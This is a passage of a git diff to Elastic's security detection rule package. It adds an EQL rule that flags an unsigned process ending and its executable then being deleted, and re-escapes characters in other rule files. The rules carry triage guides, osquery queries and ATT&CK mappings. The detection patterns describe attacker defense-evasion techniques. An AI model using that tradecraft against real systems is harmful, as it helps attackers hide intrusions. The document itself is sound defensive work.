\"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", "related_integrations": [ { @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_108.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_108.json new file mode 100644 index 00000000000..ee9b19f1a72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_108.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Termination followed by Deletion", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*\\\\DismHost.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\DismHost.exe\",\n \"?:\\\\$WinREAgent\\\\Scratch\\\\*\\\\DismHost.exe\",\n \"?:\\\\Windows\\\\tenable_mw_scan_*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\LogiUI\\\\Pak\\\\uninstall.exe\"\n )\n ] by file.path\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "09443c92-46b3-45a4-8f25-383b028b258d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + }, + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "09443c92-46b3-45a4-8f25-383b028b258d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json index d1e694a6394..d50d961d6f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json +++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_1.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json index de28f5b43fe..b14c1c4ab56 100644 --- a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json +++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_2.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json index d6b44381e85..5d71576b9e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json +++ b/packages/security_detection_engine/kibana/security_rule/09bc6c90-7501-494d-b015-5d988dc3f233_3.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json index 03044de57a5..96343e41643 100644 --- a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json +++ b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json index 931551b428d..caec69a43ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json +++ b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json index d7eae65162b..f4fc9dbc9ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0ab319ef-92b8-4c7f-989b-5de93c852e93_1.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json index c3063466d68..aebdca2b7f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_1.json @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json index 5334a4e61a5..fc1441414cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_2.json @@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json index 7dabb72dac4..dbbab0b5bae 100644 --- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_3.json @@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json index eaf163e8adc..6e888fa4f58 100644 --- a/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_4.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json index ae8cd0f0794..478cb83a31d 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json index d59b151dc6a..ddd5342df96 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 